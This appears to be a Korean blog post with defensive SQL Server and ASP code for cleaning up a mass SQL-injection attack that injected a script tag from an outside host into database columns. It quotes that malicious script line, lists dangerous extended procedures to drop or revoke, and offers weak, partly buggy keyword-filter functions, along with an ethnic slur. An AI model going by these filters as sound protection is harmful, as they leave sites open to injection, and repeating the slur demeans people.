ASP

1. 일단 이미 들어온 짱개놈들~~ 삭제쿼리는 다음과 같이

DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = ‘u’ AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
‘update ['+@T+'] set ['+@C+'] = replace(convert(varchar(8000),['+@C+']),”<script src=http://s.ardoshanghai.com/s.js></script>”,””)
where ['+@C+'] like ”%<script%”’
)
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

exec sp_helpfile;

빨간부분은 해당 들어온 스크립트를 삽입!!

2. 다음은 SQL Injecttion 방지를 위하여~~~ 여기저기 참조하여만들어본 쿼리~~

Use master
IF OBJECT_ID(‘[dbo].[xp_cmdshell]‘) IS NOT NULL BEGIN
exec sp_dropextendedproc ‘xp_cmdshell’
END
go
Use master
exec sp_dropextendedproc ‘xp_dirtree’
exec sp_dropextendedproc ‘xp_enumgroups’
exec sp_dropextendedproc ‘xp_fixeddrives’
exec sp_dropextendedproc ‘xp_loginconfig’
exec sp_dropextendedproc ‘xp_enumerrorlogs’
exec sp_dropextendedproc ‘xp_getfiledetails’
exec sp_dropextendedproc ‘Sp_OACreate’
exec sp_dropextendedproc ‘Sp_OADestroy’
exec sp_dropextendedproc ‘Sp_OAGetErrorInfo’
exec sp_dropextendedproc ‘Sp_OAGetProperty’
exec sp_dropextendedproc ‘Sp_OAMethod’
exec sp_dropextendedproc ‘Sp_OASetProperty’
exec sp_dropextendedproc ‘Sp_OAStop’
exec sp_dropextendedproc ‘Xp_regaddmultistring’
exec sp_dropextendedproc ‘Xp_regdeletekey’
exec sp_dropextendedproc ‘Xp_regdeletevalue’
exec sp_dropextendedproc ‘Xp_regenumvalues’
exec sp_dropextendedproc ‘Xp_regread’
exec sp_dropextendedproc ‘Xp_regremovemultistring’
exec sp_dropextendedproc ‘Xp_regwrite’
drop procedure sp_makewebtask
go

Use master
exec sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’
exec sp_addextendedproc ‘xp_dirtree’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_enumgroups’, ‘xplog70.dll’
exec sp_addextendedproc ‘xp_fixeddrives’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_loginconfig’, ‘xplog70.dll’
exec sp_addextendedproc ‘xp_regaddmultistring’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_regdeletekey’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_regdeletevalue’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_regread’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_regremovemultistring’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_regwrite’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_enumerrorlogs’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_getfiledetails’, ‘xpstar.dll’
exec sp_addextendedproc ‘xp_regenumvalues’, ‘xpstar.dll’
go

REVOKE EXECUTE ON xp_regread FROM public
REVOKE EXECUTE ON xp_instance_regread FROM public
REVOKE EXECUTE ON dbo.sp_runwebtask FROM public
go

Use msdb
REVOKE EXECUTE ON sp_add_job FROM public
REVOKE EXECUTE ON sp_add_jobstep FROM public
REVOKE EXECUTE ON sp_add_jobserver FROM public
REVOKE EXECUTE ON sp_start_job FROM public
REVOKE ALL ON dbo.mswebtasks FROM public
REVOKE EXECUTE ON sp_enum_dtspackages FROM public
REVOKE EXECUTE ON sp_get_dtspackage FROM public
REVOKE EXECUTE ON sp_get_sqlagent_properties FROM public
go

Use master
dbcc xp_cmdshell(free)
dbcc xp_dirtree(free)
dbcc xp_regdeletekey(free)
dbcc xp_regenumvalues(free)
dbcc xp_regread(free)
dbcc xp_regwrite(free)
dbcc sp_makewebtask(free)
dbcc sp_adduser(free)
go

Use master
DENY EXECUTE ON [master].[dbo].[xp_subdirs] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_dirtree] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_availablemedia] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regwrite] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regread] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regaddmultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regdeletekey] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regdeletevalue] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regremovemultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_regaddmultistring] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_fileexist] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_fixeddrives] TO [guest] CASCADE
DENY EXECUTE ON [master].[dbo].[xp_getfiledetails] TO [guest] CASCADE
go

3. 다음은 ASP 관련 처리가 돼겠다~!

페이지상단처리

인젝션 유형: 제일많이 쓰는 내용이 ” — “, 혹은 ” ‘ ” 혹은 ” ; ”

이 세개의 특수문자이기 때문에 쿼리스트링에 해당 문자열이 포착되면은
에러페이지로 이동됩니다

1) 일반형식
Function RequestCheck(string)
If Instr(string,”‘”)>0 or Instr(string,”–”) or Instr(string,”;”) then
Response.redirect “/error.asp”
else
str = string
End if
RequestCheck = str
End Function

Qri = Request.ServerVariables(“Query_String”)
Call RequestCheck(Qri)

2) 폼형식

Function FormCheck(string,opt)
If Instr(string,”–”) or Instr(string,”;”) then
if opt=1 then
str = Replace(str,”–”,”..”)
str = Replace(str,”;”,”:”)
elseif opt=2 then
Response.redirect “/error.asp”
end if
else
str = string
End if
FormCheck = str
End Function

subject = FormCheck(Request.Form(“subject”),1)

월	화	수	목	금	토	일
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31

SQL Injection 스크립트삽입 해킹 방지책!

Recent Posts

5월 2012

ASP

SQL Injection 스크립트삽입 해킹 방지책!

Recent Posts

Tags

5월 2012

Log in